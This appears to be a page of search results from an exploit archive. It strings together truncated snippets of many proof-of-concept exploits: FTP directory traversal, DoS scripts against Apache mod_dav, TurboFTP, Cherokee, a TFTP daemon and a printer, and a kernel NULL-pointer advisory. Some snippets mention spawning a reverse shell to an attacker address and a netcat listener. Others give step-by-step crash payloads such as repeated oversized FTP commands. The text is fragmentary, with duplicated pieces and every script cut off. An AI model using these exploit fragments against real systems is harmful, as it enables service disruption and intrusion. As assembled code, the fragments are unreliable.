Next Page >>
sock
== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP
# by Gynvael Coldwind
import socket
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
== Proof of Concept ==
# python localhost ftp server
import socket
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
== Proof of Concept ==
# python localhost ftp server
# by Gynvael Coldwind
import socket
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################
use IO::Socket;
use MIME::Base64;
sub usage {
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
=== src/lib/rpc/svc.c
==================================================================
- --- src/lib/rpc/svc.c (revision 1666)
+++ src/lib/rpc/svc.c (local)
@@ -109,15 +109,17 @@
if (sock < FD_SETSIZE) {
xports[sock] = xprt;
FD_SET(sock, &svc_fdset);
+ if (sock > svc_maxfd)
+ svc_maxfd = sock;
}
=== src/lib/rpc/svc.c
==================================================================
- --- src/lib/rpc/svc.c (revision 1666)
+++ src/lib/rpc/svc.c (local)
@@ -109,15 +109,17 @@
if (sock < FD_SETSIZE) {
xports[sock] = xprt;
FD_SET(sock, &svc_fdset);
+ if (sock > svc_maxfd)
+ svc_maxfd = sock;
}
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";
use IO::Socket;
if ($#ARGV ne 3) {
print "\n usage: $0 <targetip> <targetport> <user> <password>\n";
exit(0);
}
use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;
$SIG{INT} = \&abort;
my $host = '192.168.4.52';
my $port = 20000;
A quick comment on the TclShell source code (v0.1) included in http://www.irmplc.com/content/pdfs/Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf
The echo procedure fails to close the client socket on EOF. This will cause the readable fileevent to trigger repeatedly consuming CPU and never freeing the socket. As the Tcl interpreter on Cisco devices has a relatively small number of sockets (255 total system wide if memory serves) repeated connections to the backdoor would exhaust all available (to Tcl) sockets on the device effectively DoS'ing other Tcl scripts and probes running.
I'd recommend rewriting the echo proc as:
proc echo {sock} {
global var
if {[catch {gets $sock line}] ||
#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)
use IO::Socket;
$|=1;
#freebsd reverse shell port 443
#setup a netcat on this port ^^
FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".
POC:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
=============
#!/usr/bin/perl -w
use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
#
# This PoC will completly DoS the printer and all is services, Use it
at your own risk.
#
use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV < 1 )
{
print "usage: perl ".$0." <ip> <port>";
exit();
*/
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03 (at) teraexe (dot) com
//Website: www.teraexe.com
//
//################################################
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03@teraexe.com
//Website: www.teraexe.com
//
//################################################
*/
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
$data = "?" x 500000;
for($i= 0; $i < 1000; $i++)
{
$sock= new IO::Socket::INET( PeerAddr => "localhost",
PeerPort => 8028,
Proto => 'tcp',
Type => SOCK_STREAM,
"Accept-Language: en-US,en;q=0.9\r\n".
"Accept-Charset: iso-8859-1,*,utf-8\r\n".
"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n";
use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
Update to 0.99.6
PoC
================================
//main.cpp
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
char *http =
Details:
If you could log on the server successfully, take the following steps and the application
will stop service:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is an easy use FTP server Application. Denial of service vulnerability exists in XM Personal
FTP Server when "APPE" is used in one socket connection while "DELE" command is used in another.
Details:
If you could log on the server successfully, take the following steps and the ftp server will stop responding:
first socket connection:
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
--------------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')
or die "error: $!\n";
Earlier versions may also be affected
Overview:
TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when
"APPE" and "DELE" commands are used in the same socket connection.
Details:
If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to
Denial of Service attack:
Severity:
High
Exploit example:
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
Linux NULL pointer dereference due to incorrect proto_ops initializations
-------------------------------------------------------------------------
In the Linux kernel, each socket has an associated struct of operations
called proto_ops which contain pointers to functions implementing various
features, such as accept, bind, shutdown, and so on.
If an operation on a particular socket is unimplemented, they are expected
to point the associated function pointer to predefined stubs, for example if
the "accept" operation is undefined it would point to sock_no_accept(). However,
Next Page>>
|
